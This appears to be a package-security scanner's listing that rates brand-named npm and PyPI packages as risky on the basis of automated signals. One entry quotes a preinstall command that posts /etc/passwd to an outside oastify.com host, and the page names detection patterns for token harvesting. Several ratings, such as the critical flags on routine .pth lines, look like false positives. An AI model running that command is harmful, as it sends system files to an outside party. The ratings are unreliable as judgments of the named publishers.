  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in package/scripts/backfill.js:22677 (+9 more occurrence(s) elsewhere)
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in package/scripts/backfill.js:24258 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/scripts/backfill.js:22890 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/backfill.js:22658 (+10 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in package/scripts/backfill.js:22677 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/scripts/backfill.js:22085 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in package/scripts/backfill.js:1990 (+12 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/scripts/backfill.js:23097 (+9 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/scripts/backfill.js:22217 (+10 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
215 200d 9 126,693 ↑0.0/day
Very Risky
vllm pypi 0.17.2.post1 vLLM Team — 🪝
Package purpose: A high-throughput and memory-efficient inference and serving engine for LLMs
Claimed homepage: https://pypi.org/project/vllm-hust/
Matched naming pattern: python-vllm-hust
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 200
Code-only verdict: SUSPICIOUS (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 9/month, 3/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 126693 lines, 5.7 MB across 1606 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'vllm-hust' matches AI hallucination template [python] + [vllm] + [hust].
  • HIGHClaims critical enterprise brand identity ('VLLM').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (172 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/check-wheel-size.py:12
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/performance-benchmarks/scripts/compare-json-results.py:1141
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/backend_request_func.py:223
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/benchmark_batch_invariance.py:108
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/check-wheel-size.py:12
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/.buildkite/performance-benchmarks/scripts/compare-json-results.py:1141
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/backend_request_func.py:223
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/benchmark_batch_invariance.py:108
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/disagg_benchmarks/disagg_prefill_proxy_server.py:125
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/kernels/benchmark_block_fp8_gemm.py:7
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/kernels/benchmark_device_communicators.py:301
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_hust-0.17.2.post1/benchmarks/kernels/benchmark_fused_collective.py:976

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
205 173d 61 2,608 ↑0.4/day
Very Risky
claude npm 1.0.3 Hendrik Mennen — 🪝
Package purpose: Cross-device session storage, shared memory, and reminders for Claude Code
Claimed homepage: https://github.com/hmennen90/claude-device-sync#readme
Matched naming pattern: claude-claude-sync
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 173
Registry downloads: 61/month, 15/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 2608 lines, 93.2 kB across 45 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (145 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/daemon/checker.js:18 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/config.js:6 (+3 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/commands/daemon.js:23
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/dist/commands/daemon.js:104
  • CRITICALSOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/dist/commands/daemon.js
Static code signals:
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/daemon/checker.js:18 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/dist/config.js:6 (+3 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/dist/commands/daemon.js:23
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/dist/commands/daemon.js:104
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/dist/commands/daemon.js
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/dist/crypto/keychain.js:19 (+1 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
205 502d 868 41,485 ↑1.7/day
Very Risky
llama pypi 0.94.0 Shamit Verma oss@shamit.in shamit.in 🪝
Package purpose: A Python package for Llama CPP.
Claimed homepage: https://github.com/shamitv/llama_cpp
Matched naming pattern: llama-llama-pydist
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 502
Registry downloads: 868/month, 199/week (MODERATE_USAGE)
Codebase size: 41485 lines, 2.3 MB across 155 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('LLAMA').
  • HIGHPublisher email 'oss@shamit.in' is not affiliated with official vendor domain.
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_pydist-0.94.0/llama_cpp/convert_model.py:67
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in llama_cpp_pydist-0.94.0/llama_cpp/convert_model.py:67
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/changelog/github_client.py:27
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in llama_cpp_pydist-0.94.0/scripts/generate_changelog.py:48
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/vendor_llama_cpp_pydist/llama.cpp/conversion/base.py:26
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/vendor_llama_cpp_pydist/llama.cpp/conversion/bert.py:117
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in llama_cpp_pydist-0.94.0/vendor_llama_cpp_pydist/llama.cpp/conversion/t5.py:30

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
195 186d 105 8,550 ↑0.6/day
Very Risky
claude npm 1.6.4 Andre Figueira — 🪝
Package purpose: LCARS-inspired operations dashboard for Claude Code. See every skill, agent, hook, MCP server, plugin, and memory file you've built, click into any of them and read the full content like a Star Trek PADD. Zero config, zero dependencies, just npx claude-hu
Matched naming pattern: claude-claude-lcars
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 186
Registry downloads: 105/month, 26/week (MODERATE_USAGE)
Codebase size: 8550 lines, 435.3 kB across 9 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (158 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/src/generate.js:6790 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/generate.js:2903 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/src/generate.js:167 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/server.js:104
Static code signals:
  • MISSING_SOURCE_REPOSITORY_URL
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'new Function()' found in package/src/generate.js:6790 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/generate.js:2903 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/src/generate.js:167 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/server.js:104
  • SOURCE_CODE_DYNAMIC_CODE_LOADER: execution primitive combined with decode/network/obfuscation call in package/src/server.js

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
190 361d 0 124,889 ↑0.0/day
Very Risky
vllm pypi 1.0.0 vLLM Team — 🪝
Package purpose: A high-throughput and memory-efficient inference and serving engine for LLMs
Claimed homepage: https://pypi.org/project/vllm-fixed/
Matched naming pattern: python-vllm-fixed
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 361
Code-only verdict: SUSPICIOUS (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 124889 lines, 6.2 MB across 788 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'vllm-fixed' matches AI hallucination template [python] + [vllm] + [fixed].
  • HIGHClaims critical enterprise brand identity ('VLLM').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 334 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/check-wheel-size.py:11
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/nightly-benchmarks/scripts/summary-nightly-results.py:72
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/backend_request_func.py:275
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/benchmark_utils.py:19
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/check-wheel-size.py:11
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/.buildkite/nightly-benchmarks/scripts/summary-nightly-results.py:72
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/backend_request_func.py:275
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/benchmark_utils.py:19
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/disagg_benchmarks/disagg_prefill_proxy_server.py:16
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/kernels/benchmark_aqlm.py:16
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in vllm_fixed-1.0.0/benchmarks/kernels/benchmark_machete.py:36
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vllm_fixed-1.0.0/csrc/moe/marlin_moe_wna16/generate_kernels.py:50

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 447d 247 10 ↑0.6/day
Very Risky
google npm 2.2.2 kasim-bugcrowd — 🪝
Package purpose: Dependency Confusion vulnerability
Matched naming pattern: ringcentral-google-drive
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 447
Registry downloads: 247/month, 61/week (MODERATE_USAGE)
Codebase size: 10 lines, 403 Bytes across 1 file (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'ringcentral-google-drive-notification-add-in' matches AI hallucination template [ringcentral] + [google] + [drive].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> '/usr/bin/curl --data '@/etc/passwd' $(hostname).tsp768bg6f5vqke8q8r5twahj8pzdq1f.oastify.com'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • INFOModerate community usage with 247 monthly downloads.
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> '/usr/bin/curl --data '@/etc/passwd' $(hostname).tsp768bg6f5vqke8q8r5twahj8pzdq1f.oastify.com'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'curl' in 'preinstall' script
  • MISSING_SOURCE_REPOSITORY_URL

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
190 846d 21 27 ↑0.0/day
🚨 Possible Stealer Very Risky
aws pypi 0.0.2 Ash Bond — 🪝 📡
Package purpose: Package to handle your cloud infrastructure
Claimed homepage: https://pypi.org/project/aws-ansible-sdk/
Matched naming pattern: aws-aws-sdk
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 846
Registry downloads: 21/month, 9/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 27 lines, 909 Bytes across 2 files (TINY_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('AWS').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 837 days ago (predates modern AI hallucination waves).
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in aws_ansible_sdk-0.0.2/src/cloudformation.py:11
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in aws_ansible_sdk-0.0.2/src/cloudformation.py:8
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in aws_ansible_sdk-0.0.2/src/cloudformation.py:8
  • CRITICALSOURCE_CODE_POTENTIAL_STEALER: potential exfiltration endpoint combined with credential/environment harvesting in aws_ansible_sdk-0.0.2/src/cloudformation.py
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in aws_ansible_sdk-0.0.2/src/cloudformation.py:11
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in aws_ansible_sdk-0.0.2/src/cloudformation.py:8
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in aws_ansible_sdk-0.0.2/src/cloudformation.py:8
  • SOURCE_CODE_POTENTIAL_STEALER: potential exfiltration endpoint combined with credential/environment harvesting in aws_ansible_sdk-0.0.2/src/cloudformation.py

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 1688d 6 176 ↑0.0/day
Very Risky
google pypi 8.0.1.0.0.99.dev5 Akretion — 🪝 ⚡
Package purpose: Export your product in google shopping
Claimed homepage: https://www.akretion.com
Matched naming pattern: odoo8-google-shopinvader
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 1688
Registry downloads: 6/month, 1/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 176 lines, 7.7 kB across 8 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'odoo8-addon-shopinvader-google-shopping' matches AI hallucination template [odoo8] + [google] + [shopinvader].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 1676 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_google_shopping-8.0.1.0.0.99.dev5-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 1688d 6 56 ↑0.0/day
Very Risky
stripe pypi 8.0.1.0.0.99.dev6 Akretion — 🪝 ⚡
Package purpose: Shopinvader Stripe Payment Gateway
Claimed homepage: https://akretion.com
Matched naming pattern: odoo8-stripe-shopinvader
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 1688
Registry downloads: 6/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 56 lines, 2.3 kB across 4 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'odoo8-addon-shopinvader-stripe' matches AI hallucination template [odoo8] + [stripe] + [shopinvader].
  • HIGHClaims critical enterprise brand identity ('STRIPE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 1676 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_shopinvader_stripe-8.0.1.0.0.99.dev6-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
190 3463d 26 31 ↑0.0/day
Very Risky
google pypi 9.0.1.0.0 ABF OSIELL, Odoo Community Association (OCA) support@odoo-community.org odoo-community.org 🪝 ⚡
Package purpose: Add support for Google Tag Manager
Claimed homepage: https://pypi.org/project/odoo9-addon-website-google-tag-manager/
Matched naming pattern: odoo9-google-website
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 3463
Registry downloads: 26/month, 2/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 31 lines, 1.4 kB across 5 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'odoo9-addon-website-google-tag-manager' matches AI hallucination template [odoo9] + [google] + [website].
  • HIGHClaims critical enterprise brand identity ('GOOGLE').
  • HIGHPublisher email 'support@odoo-community.org' is not affiliated with official vendor domain.
  • INFOEstablished pre-AI legacy package registered 3451 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo9_addon_website_google_tag_manager-9.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo_addons',));ie = os.path.exists(os.p'

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
185 25d 610 8,019 ↑24.4/day
Very Risky
auth pypi 0.0.6 xhluca — 🪝
Package purpose: Switch Claude subscriptions and API-provider keys from Claude Code
Claimed homepage: https://pypi.org/project/claude-auth-manager/
Matched naming pattern: claude-auth-manager
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 25
Registry downloads: 610/month, 34/week (MODERATE_USAGE)
Codebase size: 8019 lines, 340.6 kB across 33 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (20 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_auth_manager-0.0.6/scripts/test-fallback-tui.py:25
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_auth_manager-0.0.6/scripts/test-install-lifecycle.py:22
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_auth_manager-0.0.6/scripts/test-install-lifecycle.py:45
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in claude_auth_manager-0.0.6/scripts/test-native-switch.py:24
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_auth_manager-0.0.6/scripts/test-native-switch.py:24
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_auth_manager-0.0.6/scripts/test-native-switch.py:15
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_auth_manager-0.0.6/scripts/test-fallback-tui.py:25
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_auth_manager-0.0.6/scripts/test-install-lifecycle.py:22
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_auth_manager-0.0.6/scripts/test-install-lifecycle.py:45
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in claude_auth_manager-0.0.6/scripts/test-native-switch.py:24
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_auth_manager-0.0.6/scripts/test-native-switch.py:24
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_auth_manager-0.0.6/scripts/test-native-switch.py:15
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_auth_manager-0.0.6/scripts/test-ranked-picker.py:25
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_auth_manager-0.0.6/src/claude_auth_manager/check.py:190

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
185 127d 22 81 ↑0.2/day
Very Risky
langchain pypi 0.1.0 — — 🪝
Package purpose: LangChain integration for Nomad headless browser engine — 700× cheaper than Chrome
Claimed homepage: https://pypi.org/project/langchain-nomad/
Matched naming pattern: python-langchain-nomad
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 127
Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 22/month, 5/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 81 lines, 3.7 kB across 3 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'langchain-nomad' matches AI hallucination template [python] + [langchain] + [nomad].
  • HIGHClaims critical enterprise brand identity ('LANGCHAIN').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (115 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALOBFUSCATED_DYNAMIC_ACCESS: __import__() dynamic loading 'os' detected in langchain_nomad-0.1.0/setup.py:7
Static code signals:
  • OBFUSCATED_DYNAMIC_ACCESS: __import__() dynamic loading 'os' detected in langchain_nomad-0.1.0/setup.py:7

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
185 648d 692 18,376 ↑1.1/day
Very Risky
llama pypi 0.1.4 — staneyffer@gmail.com gmail.com 🪝
Package purpose: Add your description here
Claimed homepage: https://pypi.org/project/llama-cpp-server-py-core/
Matched naming pattern: llama-llama-server
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 648
Registry downloads: 692/month, 186/week (MODERATE_USAGE)
Codebase size: 18376 lines, 1.0 MB across 44 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('LLAMA').
  • HIGHPublisher email 'staneyffer@gmail.com' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
